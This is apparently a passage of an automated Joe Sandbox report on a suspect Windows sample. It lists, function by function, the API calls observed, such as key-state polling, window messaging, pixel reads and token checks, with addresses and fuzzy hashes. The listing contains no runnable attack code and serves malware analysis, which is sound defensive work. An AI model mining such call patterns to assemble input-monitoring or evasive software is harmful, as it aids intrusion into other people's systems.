                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 327935632-0
                                                        • Opcode ID: 162da61e8dbf40651d3f4804d262f1ed16f937ec514fb315b6de08fc170b69e1
                                                        • Instruction ID: 9d05be4531f74492fbf7d3bb312983bdcd9254ec9c824b27ef81647a3e3452ae
                                                        • Opcode Fuzzy Hash: 162da61e8dbf40651d3f4804d262f1ed16f937ec514fb315b6de08fc170b69e1
                                                        • Instruction Fuzzy Hash: 43510635A00209DFCB02EFA8C4849ADB7F9FF09324B158165E959AB712E731AE45CF91
                                                        APIs
                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003AE61F
                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 003AE648
                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 003AE687
                                                          • Part of subcall function 00349837: __itow.LIBCMT ref: 00349862
                                                          • Part of subcall function 00349837: __swprintf.LIBCMT ref: 003498AC
                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 003AE6AC
                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 003AE6B4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 1389676194-0
                                                        • Opcode ID: 37ed26a502ce2110b1dfc3ac5170f6f7449df396f28af200033e81f05a09a6b6
                                                        • Instruction ID: 963834206c37697a3abe01c3b333e37354bceb65df6b5a4e0faba485e5807499
                                                        • Opcode Fuzzy Hash: 37ed26a502ce2110b1dfc3ac5170f6f7449df396f28af200033e81f05a09a6b6
                                                        • Instruction Fuzzy Hash: 5251E935A00205DFCB16EF64C985AAEBBF5EF49314F1484A9E819AF362CB31ED11DB50
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f54fa6b466295744a11560565aabc86ab721187a08e79ec82a6272e215e70c2b
                                                        • Instruction ID: 2d15fcdb67f0899445780538afdfb3c9ad7da964c2459625706d990d30927067
                                                        • Opcode Fuzzy Hash: f54fa6b466295744a11560565aabc86ab721187a08e79ec82a6272e215e70c2b
                                                        • Instruction Fuzzy Hash: 1C412B3590491CAFD712DF34CC48FA9BBA9EB09354F1A4169F916E72E0CB30AD41DB51
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 00342357
                                                        • ScreenToClient.USER32(004057B0,?), ref: 00342374
                                                        • GetAsyncKeyState.USER32(00000001), ref: 00342399
                                                        • GetAsyncKeyState.USER32(00000002), ref: 003423A7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: AsyncState$ClientCursorScreen
                                                        • String ID:
                                                        • API String ID: 4210589936-0
                                                        • Opcode ID: 843e141c87c986bcfb8a5d02c30484089b90eb374ae77894d82c6e5654f4abdd
                                                        • Instruction ID: 5594e0a09d68c5e2775e65d64bca1ab41a33b7e3f07fa87682e43affb14a5620
                                                        • Opcode Fuzzy Hash: 843e141c87c986bcfb8a5d02c30484089b90eb374ae77894d82c6e5654f4abdd
                                                        • Instruction Fuzzy Hash: F5415339604119FFDF269F68C844BEABBB5FB05360F50435AF829AA190C734AD90DF91
                                                        APIs
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003963E7
                                                        • TranslateAcceleratorW.USER32(?,?,?), ref: 00396433
                                                        • TranslateMessage.USER32(?), ref: 0039645C
                                                        • DispatchMessageW.USER32(?), ref: 00396466
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00396475
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                        • String ID:
                                                        • API String ID: 2108273632-0
                                                        • Opcode ID: 3cd9800362e2103502aecf467b49524db2178ab00db565447d3ac55ba0874f3e
                                                        • Instruction ID: 4f3a5cf0ff737c61717842a8d09321f3b057436a63a8f742dbd5095e2103e396
                                                        • Opcode Fuzzy Hash: 3cd9800362e2103502aecf467b49524db2178ab00db565447d3ac55ba0874f3e
                                                        • Instruction Fuzzy Hash: 5E31E231A02602AFDF269FB1CD86FB77BACEB01300F114179E821D71A1E735A885DB60
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 00398A30
                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 00398ADA
                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00398AE2
                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 00398AF0
                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00398AF8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: MessagePostSleep$RectWindow
                                                        • String ID:
                                                        • API String ID: 3382505437-0
                                                        • Opcode ID: b3b4c9a8baf76d25d08d469182736da4854758c5db0ecfb3be19ca2de82e8c4e
                                                        • Instruction ID: 9e945881b265b744a906a0e4bd945e59ab424563adafa256a7f6cb4147398d81
                                                        • Opcode Fuzzy Hash: b3b4c9a8baf76d25d08d469182736da4854758c5db0ecfb3be19ca2de82e8c4e
                                                        • Instruction Fuzzy Hash: 7E31E071500219EFDF15CFA8DD4CA9E7BB9EB45315F11822AF925EB2D0C7B09910DB90
                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 0039B204
                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0039B221
                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0039B259
                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0039B27F
                                                        • _wcsstr.LIBCMT ref: 0039B289
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                        • String ID:
                                                        • API String ID: 3902887630-0
                                                        • Opcode ID: cdcc7d8d8f5d37413ef4d5020a995f474126943a92353651469f5bbd445e5e9f
                                                        • Instruction ID: ab19c3605d9d19b57e85c2bb9951442d53201c30377acd4a29b5b487c33514a6
                                                        • Opcode Fuzzy Hash: cdcc7d8d8f5d37413ef4d5020a995f474126943a92353651469f5bbd445e5e9f
                                                        • Instruction Fuzzy Hash: F221D332204200AAEB165B79AD49E7FBBADDB49710F018529F845DA1A1EB61DC409760
                                                        APIs
                                                          • Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: 00342623
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 003CB192
                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 003CB1B7
                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 003CB1CF
                                                        • GetSystemMetrics.USER32(00000004), ref: 003CB1F8
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,003B0E90,00000000), ref: 003CB216
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Window$Long$MetricsSystem
                                                        • String ID:
                                                        • API String ID: 2294984445-0
                                                        • Opcode ID: f444a4009958933d5d4fea5daf5092e16a2dcc8fc475d643a90494cdebb37781
                                                        • Instruction ID: 7b2970c11407761a5cf081a8d5b898fdb59bb417ef9081fcdf094ddd9c8f165e
                                                        • Opcode Fuzzy Hash: f444a4009958933d5d4fea5daf5092e16a2dcc8fc475d643a90494cdebb37781
                                                        • Instruction Fuzzy Hash: 44216071910655AFCB12AF38DC15F6ABBA9EB05361F164B39BD22D71E0D7309C209B90
                                                        APIs
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00399320
                                                          • Part of subcall function 00347BCC: _memmove.LIBCMT ref: 00347C06
                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00399352
                                                        • __itow.LIBCMT ref: 0039936A
                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00399392
                                                        • __itow.LIBCMT ref: 003993A3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$__itow$_memmove
                                                        • String ID:
                                                        • API String ID: 2983881199-0
                                                        • Opcode ID: 8b8c6067b82ef104a21574d4b9b411f838a406a4c0f97f6346070b4a0a96fd79
                                                        • Instruction ID: 03263dd0565fd4796ea3754df75906b140acad81e2fbb5591d82ed483bb697d2
                                                        • Opcode Fuzzy Hash: 8b8c6067b82ef104a21574d4b9b411f838a406a4c0f97f6346070b4a0a96fd79
                                                        • Instruction Fuzzy Hash: A121B335700208ABDF13AE698CC5FAE7BADEB49710F04402AF905DB2D1D6B09D559791
                                                        APIs
                                                        • IsWindow.USER32(00000000), ref: 003B5A6E
                                                        • GetForegroundWindow.USER32 ref: 003B5A85
                                                        • GetDC.USER32(00000000), ref: 003B5AC1
                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 003B5ACD
                                                        • ReleaseDC.USER32(00000000,00000003), ref: 003B5B08
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: Window$ForegroundPixelRelease
                                                        • String ID:
                                                        • API String ID: 4156661090-0
                                                        • Opcode ID: 1dd7dc0d1cfcca7e63034143b46ebbceb043a0d1bc9cc84ebaa8595b182f2234
                                                        • Instruction ID: ea2e48574e4b92ec645070bf53583cf9bbd625e99c43f505071d7ff05803bdc7
                                                        • Opcode Fuzzy Hash: 1dd7dc0d1cfcca7e63034143b46ebbceb043a0d1bc9cc84ebaa8595b182f2234
                                                        • Instruction Fuzzy Hash: 19216F75A00104AFD715EF65D884A9ABBE9EF48350F148479F949DB762DA70BD00CB90
                                                        APIs
                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0034134D
                                                        • SelectObject.GDI32(?,00000000), ref: 0034135C
                                                        • BeginPath.GDI32(?), ref: 00341373
                                                        • SelectObject.GDI32(?,00000000), ref: 0034139C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: ObjectSelect$BeginCreatePath
                                                        • String ID:
                                                        • API String ID: 3225163088-0
                                                        • Opcode ID: d83611a286c5ece82ed0bc95bd76c4d1be058487a635785bd694ed79b19b325a
                                                        • Instruction ID: d46698a71eba155f697b203f4ec51d9b4942b4f79c93a7cd227ca79e169a4829
                                                        • Opcode Fuzzy Hash: d83611a286c5ece82ed0bc95bd76c4d1be058487a635785bd694ed79b19b325a
                                                        • Instruction Fuzzy Hash: FB218631800A08DFDB12AF25DE08B6A7BE9FB00751F148225FC14AA5B0D370A9A1DF54
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 003A4ABA
                                                        • __beginthreadex.LIBCMT ref: 003A4AD8
                                                        • MessageBoxW.USER32(?,?,?,?), ref: 003A4AED
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 003A4B03
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003A4B0A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                        • String ID:
                                                        • API String ID: 3824534824-0
                                                        • Opcode ID: 8cf44d40f38c20a74a444d958afb33be5efa3b8eefb0b3549dedf17e81b45966
                                                        • Instruction ID: a14bba0dcfcc31dff3d4b2fa81e3f5591caeacb350cdbeb6b29ece34108bf84d
                                                        • Opcode Fuzzy Hash: 8cf44d40f38c20a74a444d958afb33be5efa3b8eefb0b3549dedf17e81b45966
                                                        • Instruction Fuzzy Hash: 6C110876904614BFD7029FA89C04E9B7FADEB86320F144269F814D3250D6B1D9008BB0
                                                        APIs
                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0039821E
                                                        • GetLastError.KERNEL32(?,00397CE2,?,?,?), ref: 00398228
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00397CE2,?,?,?), ref: 00398237
                                                        • HeapAlloc.KERNEL32(00000000,?,00397CE2,?,?,?), ref: 0039823E
                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00398255
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 842720411-0
                                                        • Opcode ID: 8ff524e1305342c2e4c756e202f39315497a16cf1657b97760c32a9fe1707dbf
                                                        • Instruction ID: 4fbbc4a9ab03628de7c6c863c94d27809fb735506c6a208a8a62b313157b0e09
                                                        • Opcode Fuzzy Hash: 8ff524e1305342c2e4c756e202f39315497a16cf1657b97760c32a9fe1707dbf
                                                        • Instruction Fuzzy Hash: E1016971201604BFDF225FA6DC48D6B7FAEEF8A754B50082AF849C3220DA31AC10DB60
                                                        APIs
                                                        • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00397044,80070057,?,?,?,00397455), ref: 00397127
                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00397044,80070057,?,?), ref: 00397142
                                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00397044,80070057,?,?), ref: 00397150
                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00397044,80070057,?), ref: 00397160
                                                        • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00397044,80070057,?,?), ref: 0039716C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                        • String ID:
                                                        • API String ID: 3897988419-0
                                                        • Opcode ID: 1ca06f4788235c48a8852f43f9d6172c705cb6f57c40417d2518b63e31c62ca8
                                                        • Instruction ID: fe9fba931073874edbd7a800db87ad2db44d61f55fbecb75d66a1f4d06430689
                                                        • Opcode Fuzzy Hash: 1ca06f4788235c48a8852f43f9d6172c705cb6f57c40417d2518b63e31c62ca8
                                                        • Instruction Fuzzy Hash: 05017C76621204BFDB124F68DC44EAA7BAEEB44791F150064FD08D2260D731ED419BA0
                                                        APIs
                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003A5260
                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 003A526E
                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 003A5276
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 003A5280
                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003A52BC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                        • String ID:
                                                        • API String ID: 2833360925-0
                                                        • Opcode ID: 179873f0531f03909182b92b0bfcac090c09237fa67fb35c4875e77afc804a3c
                                                        • Instruction ID: a6b5b4bc975f417a13b03e5523ad343cc3ca62b7a166b107763a3f71aa11e585
                                                        • Opcode Fuzzy Hash: 179873f0531f03909182b92b0bfcac090c09237fa67fb35c4875e77afc804a3c
                                                        • Instruction Fuzzy Hash: 93015731D01A19DBCF02EFE4E848AEDBB7CFB0A311F460956E941F2140CB3065508BA1
                                                        APIs
                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00398121
                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0039812B
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0039813A
                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00398141
                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00398157
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132171077.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132193214.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_340000_Q5QrxfKnFA.jbxd
                                                        Similarity
                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 44706859-0
                                                        • Opcode ID: 600764ac2f6f0cc5394f1faed5157ea3a9103a6fb602a7b5aa6feb589ded17cb
                                                        • Instruction ID: 738d03bc0634a3d8a8ed229feedd446f793dfd6d2d3a6345f712e23f9509e6ce
                                                        • Opcode Fuzzy Hash: 600764ac2f6f0cc5394f1faed5157ea3a9103a6fb602a7b5aa6feb589ded17cb
                                                        • Instruction Fuzzy Hash: DCF06275200314BFEB121FA5EC88E6B3BADFF8AB54F040025F945C6150CB61ED41DB60
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003E9), ref: 0039C1F7
                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 0039C20E
                                                        • MessageBeep.USER32(00000000), ref: 0039C226
                                                        • KillTimer.USER32(?,0000040A), ref: 0039C242
                                                        • EndDialog.USER32(?,00000001), ref: 0039C25C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131995011.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                        • Associated: 00000000.00000002.2131834515.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2132073453.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
